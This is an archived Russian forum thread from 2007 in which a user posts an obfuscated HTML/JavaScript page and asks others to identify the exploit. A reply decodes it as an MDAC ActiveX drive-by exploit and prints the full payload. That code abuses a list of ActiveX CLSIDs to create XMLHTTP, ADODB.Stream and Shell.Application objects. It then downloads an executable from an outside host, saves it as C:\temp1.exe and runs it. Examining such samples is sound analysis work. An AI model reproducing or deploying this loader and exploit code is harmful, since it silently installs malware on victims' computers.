PDA

Просмотр полной версии : Кто распознает эксплойт


avt0
24.04.2007, 16:56
<html><head><meta http-equiv="expires" content="2"><meta http-equiv="imagetoolbar" content="no"><style type="text/css" media="print"><!--
body{display:none}--></style></head><body>
<script language="JavaScript" type="text/javascript"><!--
var k="",e=62,u="",r="9l Vn0Oq;scE5J(Wh>Ix<D3!-tS1\"8i&o)/fz=BewNb:2Pjpva|yTgUdMmur.k";eval(unescape("%66%75%6E%63%74%69%6F%6E%20%6A%28%6C%29%7B%76%61%7 2%20%66%3D%27%27%2C%69%2C%67%2C%63%2C%70%3B%66%6F% 72%28%69%3D%30%3B%69%3C%6C%2E%6C%65%6E%67%74%68%3B %69%2B%2B%29%7B%67%3D%6C%2E%63%68%61%72%41%74%28%6 9%29%3B%63%3D%72%2E%69%6E%64%65%78%4F%66%28%67%29% 3B%69%66%28%63%3E%2D%31%29%7B%70%3D%28%28%63%2B%31 %29%25%65%2D%31%29%3B%69%66%28%70%3C%3D%30%29%7B%7 0%2B%3D%65%7D%66%2B%3D%72%2E%63%68%61%72%41%74%28% 70%2D%31%29%7D%65%6C%73%65%7B%66%2B%3D%67%7D%7D%75 %2B%3D%66%7D%3B%66%75%6E%63%74%69%6F%6E%20%64%64%6 4%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74% 65%28%75%29%3B%6B%3D%22%22%7D"));j("DcE.&vSV |0Ur|UwB8(|a|1E.&vS8VSTvwB8Sw<Sfp|a|cE.&vS8ID-tt\nzr0ES&)0VErW/{.wSr.0Vz| cw}zr0ES&)0V)urWw/{&zWwkN>&E>BB\"/{N&0M)Nk.w w|cw5aw0ScW5aw0Skmqd15mqn5/sN&0M)Nk)0u)rcwu)awB0r }}zr0ES&)0V0.Ww/{&zWwkN>&E>BB\"/{N&0M)NkE|vSr.w5aw0ScW5aw0Skmqd15mqn5/sN&0M)Nk)0u)rcwu)awBEr}&zWwkN>&E>BB!/{.wSr.0Vz| cw}}zr0ES&)0VEaW/{avBwaw0Sk:rSS)0s&zWavBBPyyavBB!/| w.SWr0wcE|vwW8g>|09cVz).VT)r.V.&U>SVE &E9k8//}&)BM)Eruw0Sk| s|wBM)Eruw0SkUwS5 wuw0SeTxMs&zW&)/{&zW|w/{M)Eruw0Sk)0cw wEScS|.SBErsM)Eruw0Sk)0M.|UcS|.SBE");j("rsM)Eruw0Sk)0E)0Sw<Suw0rBEr}w cw{M)Eruw0Sk)0u)rcwM)N0BEa}}&zW|woo-&)/{M)Eruw0Sk)0u)rcwM)N0BErsM)Eruw0Sk)0u)rcwrvB0.sM)E ruw0Sk)0E)0Sw<Suw0rBEr}&zWM)Eruw0Sk |Tw.c/{N&0M)NkE|vSr.w5aw0ScW5aw0Skmqd15djy5aw0Skmqd153qhb/sN&0M)Nk)0u)rcwM)N0B0.sN&0M)Nk)0u)rcwrvB)ur}zr0ES&)0V;|OW/{N&0M)NkcS|SrcB8V8scwSg&uw)rSW8;|OW/8,JO/};|OW/szr0ES&)0V;|\"W/{.wSr.0VS.rw}&zWM)Eruw0Sk| yyM)Eruw0SkUwS5 wuw0SeTxM/M)Eruw0Sk:)MTk)0u)rcw)aw.B;|\"ffttIDfcE.&vSID-tt[&zVUSwVx5VJ]IDM&aV&MB8vl=8VcST wB8v)c&S&)02|:c) rSwsN&MS>2Ov<s>");j("w&U>SBOv<sa&c&:& &ST2>&MMw08V)0E &E9B8E &v:)|.M3|S|kE w|.3|S|W/8IDfM&aIDcE.&vSV |0Ur|UwB8(|a|1E.&vS8VSTvwB8Sw<Sfp|a|cE.&vS8ID-tt\nzr0ES&)0Vvi=W/{vl=kE &E9W/scwSg&uw)rSW8vi=W/8,JOO/}vi=W/sffttIDfcE.&vSID-[w0M&z]ttIVD&z.|uwVN&MS>B8O8V>w&U>SB8O8Vc.EB8>SSv2ffuMzEk&0z)fc)zSf8IDf&z.|uwIV");ddd();document.write(k);k="";//-->
</script></body></html>

ответы в аську 111777337
или в личку.

gemaglabin
24.04.2007, 17:07
Айфрейм на http://mdfc.info/soft/ , там mdac



function CreateO(o, n) {
var r = null;
try { eval("r = o.CreateObject(n)") }catch(e){}
if (! r) {try { eval("r = o.CreateObject(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o.CreateObject(n, \"\", \"\")") }catch(e){}}
if (! r) {try { eval("r = o.GetObject(\"\", n)") }catch(e){}}
if (! r) {try { eval("r = o.GetObject(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o.GetObject(n)") }catch(e){}}
return(r);
}
function Go(a) {
var obj_msxml2 = CreateO(a,"ms"+"xm"+"l2.XM"+"LHT"+"TP");
obj_msxml2.open("GET","http://www.mdfc.info/soft/get.php?exp=mdac2",false);
obj_msxml2.send();
var obj_adodb = CreateO(a,"ado"+"d"+"b.str"+"ea"+"m");
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\temp1.exe";
obj_adodb.SaveToFile(fn,2);
var s = CreateO(a, "S"+"he"+"ll.App"+"lica"+"tion");
s.ShellExecute(fn);
return TRUE;
}
var i = 0;
var t = new Array(
"{BD96C556-65A3-11D0-983A-00C04FC29E30}","{BD96C556-65A3-11D0-983A-00C04FC29E36}",
"{AB9BCEDD-EC7E-47E1-9322-D4A210617116}","{0006F033-0000-0000-C000-000000000046}","{0006F03A-0000-0000-C000-000000000046}","{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}","{6414512B-B978-451D-A0D8-FCFDF33E833C}","{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}","{06723E09-F4C2-43c8-8358-09FCD1DB0766}","{639F725F-1B2D-4831-A9FD-874847682010}","{BA018599-1DB3-44f9-83B4-461454C84BF8}","{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}","{E8CCCDDF-CA28-496b-B050-6C07C962476B}",null);

while (t[i]) {
var a = null;

if (t[i].substring(0,1) == "{") {
a = document.createElement("ob"+"ject");
a.setAttribute("cl"+"ass"+"id", "cl"+"sid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}

if (a) {
try {
var b = CreateO(a, "She"+"ll.A"+"ppli"+"cat"+"ion");
if (b) {
if (Go(a)) break;
}
}catch(e){}
}
i++;
}

avt0
24.04.2007, 17:46
это в demo.абоцээмс.ru :D
гг